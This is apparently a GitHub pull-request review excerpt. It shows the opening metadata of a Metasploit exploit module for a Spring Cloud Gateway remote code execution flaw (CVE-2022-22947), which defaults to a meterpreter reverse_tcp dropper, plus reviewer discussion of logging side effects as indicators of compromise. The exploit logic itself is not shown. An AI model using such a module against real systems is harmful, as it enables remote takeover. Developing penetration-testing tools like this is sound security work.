modules/exploits/linux/http/spring_cloud_gateway_rce.rb

```diff
@@ -0,0 +1,143 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Spring Cloud Gateway Remote Code Execution',
+        'Description' => %q{
+          This module exploits a Remote Code Execution vulnerability in Spring Cloud Gateway versions = 3.1.0 and 3.0.0 to 3.0.6.
+          The vulnerability can be exploited when the Gateway Actuator endpoint is enabled, exposed and unsecured.
+          An attacker can use SpEL expressions to execute code and take control of the victim machine. This module only supports Linux Droppers.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Ayan Saha'
+        ],
+        'References' => [
+          ['CVE', '2022-22947' ],
+          ['URL', 'https://github.com/crowsec-edtech/CVE-2022-22947'],
+          ['URL', 'https://wya.pl/2022/02/26/cve-2022-22947-spel-casting-and-evil-beans/']
+        ],
+        'Platform' => 'linux',
+        'Arch' => [ARCH_X64],
+        'Targets' => [
+
+          [
+            'Linux (Dropper)',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X64],
+              'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' },
+              'Type' => :linux_dropper
+            }
+          ],
+        ],
+        'DisclosureDate' => '2022-03-03',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'SideEffects' => []
```

Comment:
I'm guessing that we might also want to add some logging for side effects, as I got this:
![image](https://user-images.githubusercontent.com/17987018/193691238-fc03721a-f99a-461a-833a-2de4d9a9cf31.png)

Reply:
What's the keyword for that? The only one I could see in other repo is 'IOC_IN_LOGS' . Not sure if we can call it an IOC, as IOCs are supposed to be unique and this log messages doesn't look unique to me.

Although multiple non-unique atomic IOCs can combine to make an unique complex IOC.